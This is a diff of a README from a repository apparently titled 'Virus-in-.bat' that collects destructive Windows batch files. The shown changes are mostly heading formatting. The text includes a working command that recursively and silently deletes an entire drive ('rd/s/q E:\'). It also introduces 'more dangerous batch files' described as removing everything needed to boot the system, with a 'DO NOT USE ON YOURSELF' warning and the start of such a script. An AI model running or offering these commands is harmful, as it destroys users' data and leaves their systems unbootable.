max-code971/Virus-in-.bat/README.md

 <br>
 rd/s/q E:\
 <hr>
-And now more dangerous batch files:
+---And now more dangerous batch files:

-Causes the system to crash once then the computer cannot be restarted.
+### 4. Causes the system to crash once then the computer cannot be restarted.
-It removes everything needed to start the system
+-It removes everything needed to start the system:
 <br>
-DO NOT USE ON YOURSELF
+### ---DO NOT USE ON YOURSELF

 @echo off
 <br>